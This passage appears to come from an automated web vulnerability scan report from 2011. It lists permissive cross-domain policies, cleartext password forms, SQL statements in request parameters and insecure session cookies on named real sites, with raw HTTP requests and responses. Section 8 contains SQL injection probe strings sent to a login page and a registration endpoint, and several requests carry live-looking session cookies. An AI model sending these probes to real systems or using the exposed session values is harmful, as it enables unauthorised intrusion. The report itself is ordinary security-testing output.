Last-Modified: Wed, 23 Jun 2010 20:40:25 GMT
Content-Length: 585

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy><site-control permitted-cross-domain-policies="master-only" /><allow-access-from domain="v.wordpress.com" to-ports="80,443" /><allow-access-from domain="v0.wordpress.com" to-ports="80,443" secure="false" /><allow-access-from domain="videopress.com" to-ports="80,443" secure="false" /><allow-access-from domain="s0.videopress.com" to-ports="80,443" secure="false" /><allow-access-from domain="realeyes.com" to-ports="80,443" />
...[SNIP]...

6. Silverlight cross-domain policy
There are 3 instances of this issue:

6.1. http://ad.doubleclick.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Wed, 21 May 2008 19:54:04 GMT
Date: Tue, 26 Apr 2011 11:34:22 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

6.2. http://firstdata.122.2o7.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://firstdata.122.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: firstdata.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:46:30 GMT
Server: Omniture DC/2.0.0
xserver: www389
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

6.3. http://stats.wordpress.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://stats.wordpress.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: stats.wordpress.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Apr 2011 01:20:51 GMT
Content-Type: text/xml
Connection: close
Accept-Ranges: bytes
ETag: "135-4c7e718e-78124"
Last-Modified: Wed, 01 Sep 2010 15:30:22 GMT
Content-Length: 309

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
</allow-from>
<grant-to>

...[SNIP]...

7. Cleartext submission of password
There are 6 instances of this issue:

7.1. http://afreshbunch.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://afreshbunch.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password fields:

Request

GET /?page=login&cmd=register HTTP/1.1
Host: afreshbunch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=214603079.1303778640.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); site=referring%5Fsite=http%3A%2F%2Fwww%2Eafreshbunch%2Ecom%2F%3Fpage%3Dlogin; ASPSESSIONIDSSTDDTRS=KCCEHBADJFMPMBJHMBPOOFIB; __utma=1.1546818399.1303779795.1303779795.1303779795.1; __utmb=1; __utmc=1; __utmz=1.1303779795.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=214603079.709171066.1303778640.1303778640.1303778640.1; __utmc=214603079; __utmb=214603079.10.10.1303778640

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 29083
Content-Type: text/html
Expires: Tue, 26 Apr 2011 01:05:01 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 01:06:00 GMT

<!DOCTYPE html>
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">


<head>
<link href="/user/453756/theme/favicon.ico" rel="SHORTCUT ICON" />
<link rel="alternate" type="application/rs
...[SNIP]...
<td valign="top" class="element-row1">
                   <form method="POST" action="/?page=login&cmd=start_reg" name="register_form" id="geoform" language="JavaScript">
                   <fieldset>
...[SNIP]...
<div class="field"><input maxLength="12" name="password" size="20" type="password"></div>
...[SNIP]...
<div class="field"><input maxLength="12" name="password1" size="20" type="password"></div>
...[SNIP]...

7.2. http://afreshbunch.com/forums/

Summary

Severity:   High
Confidence:   Certain
Host:   http://afreshbunch.com
Path:   /forums/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /forums/?page=t&sa=mine HTTP/1.1
Host: afreshbunch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=214603079.1303778640.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); site=referring%5Fsite=http%3A%2F%2Fwww%2Eafreshbunch%2Ecom%2F%3Fpage%3Dlogin; ASPSESSIONIDSSTDDTRS=KCCEHBADJFMPMBJHMBPOOFIB; __utma=1.1546818399.1303779795.1303779795.1303779795.1; __utmb=1; __utmc=1; __utmz=1.1303779795.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=214603079.709171066.1303778640.1303778640.1303778640.1; __utmc=214603079; __utmb=214603079.9.10.1303778640

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 16260
Content-Type: text/html
Expires: Tue, 26 Apr 2011 01:04:52 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 01:05:52 GMT

<!DOCTYPE html>
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">


<head>
<link href="/user/453756/theme/favicon.ico" rel="SHORTCUT ICON" />
<link rel="alternate" type="application/rs
...[SNIP]...
<div class="element-inner-div">


<form method="POST" name="login_form" action="/?page=login&cmd=passme">


<p>
...[SNIP]...
<td width="65%" nowrap class="element-row1-inner">
    <input TYPE="password" NAME="password" size="30"></td>
...[SNIP]...

7.3. http://learn.bridgefront.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://learn.bridgefront.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: learn.bridgefront.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:23:40 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: JSESSIONID=F135E1A487FF7E17C2D48B02FB00CAEA; Path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 34161


<html>
<head>

<title>BridgeFront | LMS | Login</title>
<link href="/lscheme/default/css/Learner.css" rel="stylesheet" type="text/css">
<script type="text/javascript" src="/js/LearnerSideJsFun
...[SNIP]...
<td style="height: 134px">
<form name="loginform" id="loginform" method="post" action="/logincontroller" onsubmit="return specialValidation()">
                <input type="hidden" name="forwardpage" id="forwardpage" value="lm_login.jsp">
...[SNIP]...
<td width="35%"><input name="replace1_ul_" id="replace1_ul_" type="password" class="TxtField" style="width: 204px" maxlength="50"></td>
...[SNIP]...

7.4. http://learn.bridgefront.com/login.jsp

Summary

Severity:   High
Confidence:   Certain
Host:   http://learn.bridgefront.com
Path:   /login.jsp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /login.jsp?reason=keyfailed HTTP/1.1
Referer: http://learn.bridgefront.com/KeyRegister
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: learn.bridgefront.com
Cookie: JSESSIONID=1B3FB576C860FF50C5478C31E0BD27CE
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:35:22 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 34227


<html>
<head>

<title>BridgeFront | LMS | Login</title>
<link href="/lscheme/default/css/Learner.css" rel="stylesheet" type="text/css">
<script type="text/javascript" src="/js/LearnerSideJsFun
...[SNIP]...
<td style="height: 134px">
<form name="loginform" id="loginform" method="post" action="/logincontroller" onsubmit="return specialValidation()">
                <input type="hidden" name="forwardpage" id="forwardpage" value="lm_login.jsp">
...[SNIP]...
<td width="35%"><input name="replace1_ul_" id="replace1_ul_" type="password" class="TxtField" style="width: 204px" maxlength="50"></td>
...[SNIP]...

7.5. http://login.sisna.com/login_multiple/

Summary

Severity:   High
Confidence:   Certain
Host:   http://login.sisna.com
Path:   /login_multiple/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /login_multiple/?SAMLRequest=fZLNTsMwEITvSLxD5HuSpgWErCZVKUJU4ieigQM3x90mBmcdvE4Lb4%2BbUhUO9Gat1zPfrHc8%2BWx0sAZLymDKkmjAAkBplgqrlD0XN%2BElm2SnJ2MSjW75tHM1PsFHB%2BQC%2FxKJ9xcp6yxyI0gRR9EAcSf5Ynp%2Fx4fRgLfWOCONZsH8OmVthfBmymb1rkFUAAJVje9YVqJUAkpVSV1DXQELXvZYwy3WnKiDOZIT6HxpkCTh4CwcXhTJkI8u%2BfnolQX5j9OVwl2CY1jlron4bVHkYf64KHqBtVqCffDdKauMqTRE0jRb%2B1wQqbUvr4QmjzclAus84MwgdQ3YBdi1kvD8dJey2rmWeBxvNpvoIBOL2LOg2J0lsawfLO%2Bz2V8TPU4u9s4sO2iP419S2c%2BHbXPMr3OjlfwKplqbzcyCcD6Es53PcGNsI9z%2FbkmU9BW1DFd9K%2B%2BQWpBqpWDJgjjbuf7dDL8v3w%3D%3D&RelayState=https%3A%2F%2Fwww.google.com%2Fa%2Fsisna.com%2FServiceLogin%3Fservice%3Dmail%26passive%3Dtrue%26rm%3Dfalse%26continue%3Dhttp%253A%252F%252Fmail.google.com%252Fa%252Fsisna.com%252F%26bsv%3Dllya694le36z%26ltmpl%3Ddefault%26ltmplcache%3D2 HTTP/1.1
Host: login.sisna.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:44:52 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Length: 2742
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<!-- Login Form -->
<form action="/login_multiple/?SAMLRequest=fZLNTsMwEITvSLxD5HuSpgWErCZVKUJU4ieigQM3x90mBmcdvE4Lb4%2BbUhUO9Gat1zPfrHc8%2BWx0sAZLymDKkmjAAkBplgqrlD0XN%2BElm2SnJ2MSjW75tHM1PsFHB%2BQC%2FxKJ9xcp6yxyI0gRR9EAcSf5Ynp%2Fx4fRgLfWOCONZsH8OmVthfBmymb1rkFUAAJVje9YVqJUAkpVSV1DXQELXvZYwy3WnKiDOZIT6HxpkCTh4CwcXhTJkI8u%2BfnolQX5j9OVwl2CY1jlron4bVHkYf64KHqBtVqCffDdKauMqTRE0jRb%2B1wQqbUvr4QmjzclAus84MwgdQ3YBdi1kvD8dJey2rmWeBxvNpvoIBOL2LOg2J0lsawfLO%2Bz2V8TPU4u9s4sO2iP419S2c%2BHbXPMr3OjlfwKplqbzcyCcD6Es53PcGNsI9z%2FbkmU9BW1DFd9K%2B%2BQWpBqpWDJgjjbuf7dDL8v3w%3D%3D&RelayState=https%3A%2F%2Fwww.google.com%2Fa%2Fsisna.com%2FServiceLogin%3Fservice%3Dmail%26passive%3Dtrue%26rm%3Dfalse%26continue%3Dhttp%253A%252F%252Fmail.google.com%252Fa%252Fsisna.com%252F%26bsv%3Dllya694le36z%26ltmpl%3Ddefault%26ltmplcache%3D2" method="post" name="login">
<table id="login" class="tbl_login" align="center">
...[SNIP]...
<td><input name="usernamepword" type="password" class="txt"></td>
...[SNIP]...

7.6. http://www.afreshbunch.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.afreshbunch.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password fields:

Request

GET /?page=login&cmd=register HTTP/1.1
Host: www.afreshbunch.com
Proxy-Connection: keep-alive
Referer: http://www.afreshbunch.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSSTDDTRS=AEADHBADPKOMNGPLMGMBHKBF; __utma=1.1309413586.1303778640.1303778640.1303778640.1; __utmb=1; __utmc=1; __utmz=1.1303778640.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utmz=214603079.1303778640.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=214603079.709171066.1303778640.1303778640.1303778640.1; __utmc=214603079; __utmb=214603079.1.10.1303778640; site=referring%5Fsite=http%3A%2F%2Fwww%2Eafreshbunch%2Ecom%2F

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 29083
Content-Type: text/html
Expires: Tue, 26 Apr 2011 00:43:37 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 00:44:37 GMT

<!DOCTYPE html>
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">


<head>
<link href="/user/453756/theme/favicon.ico" rel="SHORTCUT ICON" />
<link rel="alternate" type="application/rs
...[SNIP]...
<td valign="top" class="element-row1">
                   <form method="POST" action="/?page=login&cmd=start_reg" name="register_form" id="geoform" language="JavaScript">
                   <fieldset>
...[SNIP]...
<div class="field"><input maxLength="12" name="password" size="20" type="password"></div>
...[SNIP]...
<div class="field"><input maxLength="12" name="password1" size="20" type="password"></div>
...[SNIP]...

8. SQL statement in request parameter
There are 3 instances of this issue:

8.1. https://account.snap.com/signup.php

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://account.snap.com
Path:   /signup.php

Request

POST /signup.php HTTP/1.1
Host: account.snap.com
Connection: keep-alive
Referer: https://account.snap.com/signup.php
Cache-Control: max-age=0
Origin: https://account.snap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: user=id%3D16266132404ce087181f51bbd2d1a9b9%26exp%3D1366766106%26v%3D2%26origin%3Dshots%26call%3D1%26time%3D1303780536; __utma=241625280.1756088163.1303782451.1303782451.1303782451.1; __utmb=241625280; __utmc=241625280; __utmz=241625280.1303782451.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); session=id%3D55022ba0e047fea09f979fd4570d39f9%26time%3D1303782563%26created_time%3D1303782435; PHPSESSID=fc0f88fb7427f8b35b477dc2f19b745b
Content-Length: 15403

terms=Snap+Shots+Terms+of+Use+Policy%0D%0A%0D%0APLEASE+READ+VERY+CAREFULLY+THESE+TERMS+OF+USE+FOR+THE+SNAP+SHOTS+PROGRAM%2C+INCLUDING+THE+SNAP+SHARES+FEATURES%2C+BEFORE+REGISTERING.+PARTICIPATION+IN+T
...[SNIP]...
Program.%0D%0A%0D%0A2.+Program+Rules+and+Restrictions.+The+Program+is+designed+to+allow+You+to+make+some+choices+about+how+the+Program+will+appear+on+Your+Web+Site.+The+Program+will+also+allow+you+to+select+some+of+the+ads+to+serve+on+Snap+Shots+from+the+list+of+available+choices%2C+if+you+choose+to+Participate+in+Snap+Shares.+Snap+retains+the+right%2C+in+its+sole+discretion%2C+to+set+the+rules+for+all+ad+runs+%28and+of+course%2C+we+will+attempt+
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 02:04:11 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.7d PHP/5.2.8
X-Powered-By: PHP/5.2.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24725

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-t
...[SNIP]...

8.2. http://learn.bridgefront.com/KeyRegister

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://learn.bridgefront.com
Path:   /KeyRegister

Request

POST /KeyRegister HTTP/1.1
Referer: http://learn.bridgefront.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: learn.bridgefront.com
Cookie: JSESSIONID=1B3FB576C860FF50C5478C31E0BD27CE
Accept-Encoding: gzip, deflate
Content-Length: 191

replace2_ul_=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)&submit=Register

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 26 Apr 2011 01:35:22 GMT
Server: Apache/2.2.3 (Red Hat)
Location: http://learn.bridgefront.com/login.jsp?reason=keyfailed
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


8.3. https://www.fs.ustrust.com/login/login.aspx

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://www.fs.ustrust.com
Path:   /login/login.aspx

Request

GET /login/login.aspx?sgt=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns) HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.fs.ustrust.com
Cookie: Bear=TVWFHBJKf7TC1zhoN6cKOOPAr8xtme3QHkMKm7C73mI=
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 403 Forbidden
Server: Microsoft-IIS
Date: Tue, 26 Apr 2011 12:28:23 GMT
Content-type: text/html

<HEAD><TITLE>403: Access Forbidden</TITLE></HEAD>
<BODY><FONT COLOR="#CC0000"><b>Due to the presence of characters known to be used in Cross Site Scripting attacks, access is forbidden. This web site
...[SNIP]...

9. SSL cookie without secure flag set
There are 43 instances of this issue:

9.1. https://account.snap.com/signup.php

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://account.snap.com
Path:   /signup.php

Issue detail

The following cookie was issued by the application and does not have the secure flag set: PHPSESSID. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /signup.php HTTP/1.1
Host: account.snap.com
Connection: keep-alive
Referer: http://www.snap.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: user=id%3D16266132404ce087181f51bbd2d1a9b9%26exp%3D1366766106%26v%3D2%26origin%3Dshots%26call%3D1%26time%3D1303780536; __utma=241625280.1756088163.1303782451.1303782451.1303782451.1; __utmb=241625280; __utmc=241625280; __utmz=241625280.1303782451.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); session=id%3D55022ba0e047fea09f979fd4570d39f9%26time%3D1303782563%26created_time%3D1303782435

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:49:28 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.7d PHP/5.2.8
X-Powered-By: PHP/5.2.8
Set-Cookie: PHPSESSID=fc0f88fb7427f8b35b477dc2f19b745b; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81629

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-t
...[SNIP]...

9.2. https://landingpage.leads.dynamicssite.com/PostLead.aspx

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://landingpage.leads.dynamicssite.com
Path:   /PostLead.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set: sbosSession, ClientSettings, Version. Of these, sbosSession appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /PostLead.aspx HTTP/1.1
Host: landingpage.leads.dynamicssite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 410 Gone
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: sbosSession=473982fb-74e6-4678-9919-c52e596ea5bc; path=/; HttpOnly
Set-Cookie: ClientSettings=ClientLocaleList=en~en-US&WebSource=UNKNOWN&WebDestination=UNKNOWN&WebDestinationVersion=DEFAULT; path=/; HttpOnly
Set-Cookie: Version=1.0.0.0; path=/; HttpOnly
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Date: Tue, 26 Apr 2011 12:40:24 GMT
Connection: close

The page you requested was removed.

9.3. https://militarybankonline.bankofamerica.com/efs/servlet/military/login.jsp

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://militarybankonline.bankofamerica.com
Path:   /efs/servlet/military/login.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set: JSESSIONID. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /efs/servlet/military/login.jsp HTTP/1.1
Host: militarybankonline.bankofamerica.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; BOA_COM_BT_ELIGIBLE=No; ngen_throttle=964; hp_beta=B; cmTPSet=Y; state=MA; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; TLTSID=0391ABCE700010701FF8C9030944B980; TLTUID=0391ABCE700010701FF8C9030944B980; throttle_value=35

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:25:55 GMT
Server: IBM_HTTP_Server
Pragma: no-cache
Cache-Control: no-store
Cache-Control: no-cache
Cache-Control: max-age=0, must-revalidate
Expires: 0
Set-Cookie: JSESSIONID=0000ypPn6NjbViQ1Q6CVbHfcliE:13393tt7e; Path=/
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 12807


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en">
<head>
<noscript>
<META H
...[SNIP]...

9.4. https://secure.opinionlab.com/

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure.opinionlab.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the secure flag set: ASPSESSIONIDSSSARBAA. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: secure.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 4176
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSSSARBAA=IDMHJNCDAGKPHFPBJELDADJB; path=/
Date: Tue, 26 Apr 2011 12:45:31 GMT
Connection: close

<HTML>
<HEAD>
<TITLE>OnlineOpinion</TITLE>
<meta http-equiv="Content-Type" content="text/html; charset=Windows-1252">
<STYLE>
<!--
.main {FONT-FAMILY: Arial, Helvetica, Sans-serif; FONT-SIZE: 10
...[SNIP]...

9.5. https://secure.opinionlab.com/ccc01/comment_card_d.asp

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure.opinionlab.com
Path:   /ccc01/comment_card_d.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set: ASPSESSIONIDSSSARBAA. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ccc01/comment_card_d.asp HTTP/1.1
Host: secure.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 6067
Content-Type: text/html; Charset=UTF-8
Set-Cookie: ASPSESSIONIDSSSARBAA=MFMHJNCDOEKIPAJALGIFIFEG; path=/
Date: Tue, 26 Apr 2011 12:45:42 GMT
Connection: close

<!--TEMPLATE version 3.6.1 UNIVERSAL CSS: 0--><html>
<head>
<META http-equiv="Content-Type" content="text/html; charset=UTF-16">
<base href="https://secure.opinionlab.com/ccc01">
<title>Comment Ca
...[SNIP]...

9.6. https://secure.opinionlab.com/ccc01/comment_card_json_4_0_b.asp

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure.opinionlab.com
Path:   /ccc01/comment_card_json_4_0_b.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set: ASPSESSIONIDSSSARBAA. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ccc01/comment_card_json_4_0_b.asp HTTP/1.1
Host: secure.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 8179
Content-Type: text/html; Charset=UTF-8
